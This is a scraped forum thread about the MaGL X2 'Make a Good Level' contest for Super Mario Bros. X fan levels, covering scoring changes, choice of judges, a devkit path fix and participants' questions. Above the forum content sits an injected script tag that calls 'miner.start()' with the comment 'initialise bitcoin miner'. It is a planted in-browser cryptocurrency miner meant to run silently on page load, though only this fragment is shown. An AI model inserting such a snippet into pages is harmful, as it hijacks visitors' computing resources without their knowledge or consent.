<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

MaGL X2 Discussion - MaGL X2 Lands TOMORROW. GET. HYPE.

The Destroyer of Worlds
I am become death

MaGL X2 Discussion - MaGL X2 Lands TOMORROW. GET. HYPE.

Postby The Destroyer of Worlds » 4 years ago

MaGL X is Closed.

PLEASE CHECK THIS LIST TO MAKE SURE YOUR SUBMITTED LEVEL IS SOMEWHERE ON IT.

Announcements
  • Scoring system slightly changed!
    • Uniqueness (out of 15)
      Personal Fun Factor (out of 25)
      Other Person Fun Factor (out of 25)
      Music (out of 10)
      Graphics (out of 10)
      Name Use (out of 10)
      Character Use (out of 5)
The sign up thread is located here if you are interested in participating. Please read all the rules.

The "I've Received Your Level" thread is here

This is the thread for discussing your levels, choices, decisions, excitement, etc.

Feel free to discuss rejected level names, characters, and even level names you are having difficulty narrowing down. However, keep ALL level names in spoiler tags. Whether rejected or no.

The one rule is - do not post DECIDED level names. Only post possibilities you've narrowed down to or stuff you've rejected. If you want to discuss design possibilities for the level names you've decided on already... Take it to PM! I don't mind collaboration and peeps helping each other out, but not out in the open like this. I want each final level name to be a surprise.

Also, do not post finished or WIP levels for bug/play testing here. Handle that privately through PMs. Many users would be more than thrilled to help you. Just PM someone here and ask.

This thread is also for asking for help in the engine, asking for locations of custom graphics (ie: "I need a kirby graphics set. Where can I get that?"), music choices ("what feels properly epic?"), etc.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

The Destroyer of Worlds
I am become death

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Deciding the third judge was REALLY hard. I really was looking at people on the SMBX forums like FallingSnow and people here like Unaniem and Doctor Shemp. I also looked abroad and tried to get S.N.N. from SMWCentral and last year's winner, SpoonyBardOL (from the Talking Time Brothers forum), but they were (quite understandably) unwilling to judge this as many entries as would be required due to time issues.

Ultimately, I decided the most fair thing would be to give the position to the next eligible runner-up in the MaGL X2 showrunner poll. I didn't want to reuse Ignoritus, so the runner up after him was Sturg. I also think Sturg has a perfect blend of sort of talkhaus and SMBX forum level design sensibilities, so I think he's absolutely ideal for the job.

For those who don't know him... Sturg made last year's 8th place level. I have every faith in him.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Blivsey
forever an obscure pokemons
First name: Liv
Pronouns: she/her

Postby Blivsey » 4 years ago

Can't wait to get back home so I can really get to that 'assisting' thing. All I've done so far is supply Willhart with ideas, but I plan to make myself much more useful coming Monday.

Also, I'm not allowed to participate in the contest because I'm helping, am I...

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 4 years ago

Well, remember that last year's contest had a special area with stages from the judges and hub designer (as well as a few surprise people). So I'd imagine you'll still get a chance to make a level for this.

Not that I expect Horikawa to do the exact same thing for this contest's bonus world. I'm thinking there's going to be some kind of weird twist to surprise us.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

The Destroyer of Worlds
I am become death

Blivsey wrote:Can't wait to get back home so I can really get to that 'assisting' thing. All I've done so far is supply Willhart with ideas, but I plan to make myself much more useful coming Monday.

Also, I'm not allowed to participate in the contest because I'm helping, am I...
People making the hub are allowed to compete =). But you'll be sworn to secrecy regarding your placement until it's revealed!

Judges may not compete.

The Destroyer of Worlds
I am become death

Oh and you guys should be SO FREAKING HYPED for Willhart and Blivvey's hub.

Got the current WIP just the other day.

It's BEAUTIFUL.

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 4 years ago

what's up? How y'all doing?
ImageImage
ImageImageImageImage

Mabel
Just west of wierd

Postby Mabel » 4 years ago

Mabel wrote: My only goal this year is to place higher than Willhart lets go!
Image Image

The Destroyer of Worlds
I am become death

This came up in my planning for MaGL X2's post-game.

Thought I would share.

Wohlstand
PGE and LunaLUA developer

Re: Make a Good Level Contest X2 - MaGL X2 Sign-up Thread!

Postby Wohlstand » 4 years ago

Hey, in the MaGL X2 Devkit in the "A BETTER EDITOR\configs\SMBXInt\main.ini" a mistake: should be defined path to SMBX build. You should run "configure.exe" tool (which in the same folder) which will ask you for SMBX path and will made all changes automatically. This required to get able use "SMBX Integration pack" - need to define path to SMBX, therefore you will get errors with "wrong graphic file", because wrong path.

But I have easier way: remove "application-path = <change it!>" line from "A BETTER EDITOR\configs\SMBXInt\main.ini" and all will be fine ;)

The Destroyer of Worlds
I am become death

Wohlstand wrote:Hey, in the MaGL X2 Devkit in the "A BETTER EDITOR\configs\SMBXInt\main.ini" a mistake: should be defined path to SMBX build. You should run "configure.exe" tool (which in the same folder) which will ask you for SMBX path and will made all changes automatically. This required to get able use "SMBX Integration pack" - need to define path to SMBX, therefore you will get errors with "wrong graphic file", because wrong path.

But I have easier way: remove "application-path = <change it!>" line from "A BETTER EDITOR\configs\SMBXInt\main.ini" and all will be fine ;)
They're relative paths. It worked for me =/.

Wohlstand
PGE and LunaLUA developer

Postby Wohlstand » 4 years ago

Horikawa Otane wrote:
Wohlstand wrote:Hey, in the MaGL X2 Devkit in the "A BETTER EDITOR\configs\SMBXInt\main.ini" a mistake: should be defined path to SMBX build. You should run "configure.exe" tool (which in the same folder) which will ask you for SMBX path and will made all changes automatically. This required to get able use "SMBX Integration pack" - need to define path to SMBX, therefore you will get errors with "wrong graphic file", because wrong path.

They're relative paths. It worked for me =/.
Just in case, because "application-path" variable is a redefinition of a searching root ( application-path + "/worlds/", application-path + "/graphics/", etc...). All path relative, but this variable defining absolute path (if no defined, auto-value is PGE's app-path which is correct)
https://github.com/Wohlhabend-Networks/ ... n.cpp#L158, when will be 100% correctly. but "<change it!>" is invalid value

Clamestarebla
Clamkind Arch-Highlord

Postby Clamestarebla » 4 years ago

My goal this year: top 30
oh yeah
Train harder, run faster, be stronger, better, evolution never over.

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 4 years ago

Mabel wrote:
Mabel wrote: My only goal this year is to place higher than Willhart lets go!
We will see how it goes, considering I'm multitasking different levels. I do have some ideas stored up, so I'm feeling hopeful.

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 4 years ago

Got near last place in MAGL2, got middle place is MAGLX, expect a high finish for MAGLX2? If so, hype! I can't wait for MAGLX3 where I get higher than highest. The patterns are outrageous I say!
"All these flavors and you choose to be salty"
- Grandma

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 4 years ago

I can't wait to get started. My only real goal is to not fall victim to "one stupid level design decision ruins entire level" syndrome this time. If I can do that, I'll be happy. :D
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

Oddwrath
The ghost of talkhaus unlikely
Pronouns: she/her

Postby Oddwrath » 4 years ago

Any ETA on when the lists will come out?
e: nvm, just saw the op

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 4 years ago

Wow. The signup thread hasn't even been up 24 hours and we already have more than 60 posts in it, most of which are signups.

And that's not accounting for people who may have signed up through PMs.

As I recall, last year there were over 200 entrants, of which 134 made levels. I wonder how the numbers will compare this time.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

The Destroyer of Worlds
I am become death

Validon98 wrote:I can't wait to get started. My only real goal is to not fall victim to "one stupid level design decision ruins entire level" syndrome this time. If I can do that, I'll be happy. :D
Haha, to be entirely honest your level submission is one of the ones I'm looking forward to the most! I felt so bad last time around because I was having soooo much fun and then.... But yes, I'm SUPER EXCITED to see what you do this year!

Alice
?
Pronouns: Girl person

Postby Alice » 4 years ago

Oh, this is open now. I kinda want to enter and properly finish my level unlike last year but I've actually been fairly busy lately compared to usual so I think I'll just look forward to seeing what sorts of things people make this time around instead.

Shinoda
The Chick Magnet
Pronouns: they/them/their

Postby Shinoda » 4 years ago

Horikawa Otane wrote:

This came up in my planning for MaGL X2's post-game.

Thought I would share.
Maybe someone could redo it for better quality... the audio is kinda bad but the song is awesome.
Horikawa Otane wrote:Butt-lamps are -30 points, so =p
ImageImageImage

Minus
Always edits posts

Postby Minus » 4 years ago

I apologize if this was covered in the main thread, but do we need to make sure the level is playable for both characters we are given, or can we focus on just one of them?

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 4 years ago

What, did you get Link/Luigi? You pick one of the two characters you're given. This was argued extensively in the planning thread as people were concerned about being required to build Link levels that are also functional for other characters.

Minus
Always edits posts

Postby Minus » 4 years ago

Alright, awesome. Thanks!

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 4 years ago

A question to anyone who can answer, is preparing graphical sets for multiple levels considered illegal. I generally produce ten folders with a blank level in it and a graphic folder which I load with matching graphics from various packs, rename them and test them around in a level to make a nice combination of graphics. I did that for my ASMBLT level and I'm severely curious if that'll violate the rules of MAGLX2 to have loads of graphic sets I can pull from to build my level from. Is this considered cheating?
"All these flavors and you choose to be salty"
- Grandma

Return to “archive”